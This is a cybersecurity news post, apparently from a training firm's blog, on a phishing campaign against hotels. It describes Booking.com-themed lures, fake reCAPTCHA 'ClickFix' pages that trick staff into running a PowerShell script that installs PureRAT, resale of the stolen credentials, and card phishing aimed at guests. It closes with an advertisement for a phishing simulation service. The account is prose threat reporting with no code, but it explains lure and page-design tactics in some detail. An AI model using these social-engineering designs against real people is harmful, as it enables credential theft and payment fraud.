Large-Scale ClickFix Phishing Attacks Use PureRAT Malware to Target Hotel Systems
Large-Scale ClickFix Phishing Attacks Use PureRAT Malware to Target Hotel Systems
A large-scale phishing campaign that targets the hospitality sector has drawn notice from cybersecurity researchers. It entices hotel managers to ClickFix-style websites and uses malware like PureRAT to obtain their login credentials.
“The attacker’s modus operandi involved using a compromised email account to send malicious messages to multiple hotel establishments,” Sekoia stated. “This campaign leverages spear-phishing emails that impersonate Booking.com to redirect victims to malicious websites, employing the ClickFix social engineering tactic to deploy PureRAT.”
The campaign’s ultimate objective is to obtain credentials from hacked systems that allow threat actors to access booking websites like Booking.com or Expedia without authorization. These credentials are then either sold on cybercrime forums or used to send bogus emails to hotel guests in order to commit fraud.
The activity is deemed to have been in operation as of early October 2025 and to have been active since at least April 2025. It is one of a number of efforts that have been seen targeting, including a series of attacks that Microsoft reported earlier in March.
In the most recent wave examined by the French cybersecurity firm, emails are sent from a compromised email account to a number of hotels in various nations. The recipients are tricked into clicking on phony links that lead to a ClickFix page with a purported reCAPTCHA challenge to “ensure the security of your connection.”
“Upon visiting, the URL redirects users to a web page hosting a JavaScript with an asynchronous function that, after a brief delay, checks whether the page was displayed inside an iframe,” Sekoia said. “The objective is to redirect the user to the same URL but over HTTP.”
This leads to the victim copying and running a malicious PowerShell script that collects system data and downloads a ZIP archive containing a program that eventually configures persistence and loads PureRAT (also known as zgRAT) via DLL side-loading.
Numerous functionalities, including remote access, mouse and keyboard control, webcam and microphone capture, keylogging, file upload/download, traffic proxying, data exfiltration, and remote execution of commands or binaries, are supported by the modular virus. Additionally, it creates a Run registry key to establish persistence on the host and is protected by .NET Reactor to make reverse engineering more difficult.
Additionally, it has been discovered that the campaign contacts hotel guests via email or WhatsApp with valid reservation information, asking them to confirm their banking card information and click on a link as part of a verification process to keep their reservations from being canceled.
When unsuspecting visitors click on the link, they are directed to a fraudulent landing site that looks like Booking.com or Expedia but is actually meant to collect their credit card details.
According to assessments, the scheme’s threat actors are obtaining information about Booking.com administrators from illicit sites such as LolzTeam, and in certain instances, they are even offering payment based on a portion of the profits. The obtained information is then utilized to social engineer them into installing a remote access trojan (RAT) or infostealer on their systems. Traffers, who are committed experts in charge of malware propagation, are chosen to handle this work.
“Booking.com extranet accounts play a crucial role in fraudulent schemes targeting the hospitality industry,” Sekoia stated. “Consequently, data harvested from these accounts has become a lucrative commodity, regularly offered for sale in illicit marketplaces.”
“Attackers trade these accounts as authentication cookies or login/password pairs extracted from infostealer logs, given that this harvested data typically originates from malware compromise on hotel administrators’ systems.”
The business claimed to have seen a threat actor called “moderator_booking” promoting a Booking log purchase service to acquire logs related to Booking.com, Expedia, Airbnb, and Agoda, as well as a Telegram bot purchasing Booking.com logs. They assert that within 24 to 48 hours, the logs are manually reviewed.
This is usually done by using log checker programs, which can be found on cybercrime forums for as little as $40. These tools validate compromised accounts over proxies to ensure that the credentials that were collected are still valid.
“The proliferation of cybercrime services supporting each step of the Booking.com attack chain reflects a professionalization of this fraud model,” Sekoia stated. “By adopting the ‘as-a-service’ model, cybercriminals lower entry barriers and maximise profits.”
The update to the ClickFix social engineering technique, which includes an embedded video, a countdown timer, and a counter for “users verified in the last hour,” along with instructions to boost perceived authenticity and fool the user into completing the check without giving it much thought, was revealed by Push Security.
Another notable update is that the page is capable of adapting itself to display instructions that match the victim’s operating system, asking them to open the Windows Run dialog or the macOS Terminal app, depending on the device they are visiting from. The pages are also increasingly equipped to automatically copy the malicious code to the user’s clipboard, a technique called clipboard hijacking.
“ClickFix pages are becoming increasingly sophisticated, making it more likely that victims will fall for the social engineering,” Push Security said. “ClickFix payloads are becoming more varied and are finding new ways to evade security controls.”
Find out if your organization’s employees can be phished using varied techniques by cybercriminals now!
All manpower is vulnerable to phishing, and in certain situations, it only takes sending a phishing email. Knowing the precise security threats your organizational staff poses and how your users’ accounts could be compromised is crucial.
Here’s how Craw Security’s Phishing Simulation Services works:
- We have a credential capture mode that tricks users into submitting crucial information.
- A bulk of templates that mimic MFA/ 2FA using time-based storing and authenticator code algorithms.
- Our MFA also has a multi-form interface that makes it feel legitimate in the eyes of the targets.
- Adaptive MFA Challenge Scenarios, such as geo-location, device fingerprinting, or time-of-day anomalies, to deliver targeted training to users.
To know more about our varied types of facilities in the Phishing Simulation Services by Craw Security, you can just visit our Official Website on Craw Security. Else, give us a call at our hotline number, +91-9513805401, and say the magic word, “Phishing” to our representatives.
About The Author:
Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space. Besides writing for the News4Hackers blogs, he also writes for brands including Craw Security, Bytecode Security, and NASSCOM.
Read More:
Microsoft Finds a “Whisper Leak” Attack That Detects AI Chat Topics in Encrypted Traffic
About Author
English